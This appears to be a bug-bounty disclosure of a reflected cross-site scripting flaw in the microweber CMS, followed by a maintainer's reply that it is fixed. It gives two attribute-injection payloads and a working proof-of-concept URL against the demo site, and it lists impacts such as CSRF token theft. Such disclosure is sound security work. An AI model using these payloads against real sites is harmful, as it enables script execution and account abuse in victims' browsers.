Cross-site Scripting (XSS) - Reflected in microweber/microweber
Reported on
Jan 2nd 2022
Description
XSS - Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim.
PAYLOAD for firefox: a' onafterscriptexecute=alert(document.domain) c='a
(requires NO user-interaction)
PAYLOAD for all major browsers: a' onclick=alert(document.domain) c='a
(requires user-interaction)
NOTE: I'm using firefox, so I used the first payload in the PoC. You can refer to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet to know which xss payloads can be triggered in other browsers
Proof of Concept
- On firefox browser, visit
https://demo.microweber.org/demo/module/?module=admin%2Fmodules%2Fmanage&id=zaasdasdasd"+onmousemove%3dalert(1)+cc="asd&data-show-ui=admin&class=a%27+onafterscriptexecute%3dalert(document.domain)+c%20%3d'aa&from_url=https://demo.microweber.org
XSS alert will pop-up showing the domain name.
Impact
The attacker can execute any arbitrary javascript code and acheive the following:
- Steal CSRF token of the users and do any unintended actions on their behalf like buy a product etc.
- Execute malicious javascript e.g. crypto miners
and many more...
Hi thanks for report, we will fix it and post when its ready
https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
yes, it looks fixed.
Can you please validate
this bug? there will be a button on the right side on this report.
@maintainer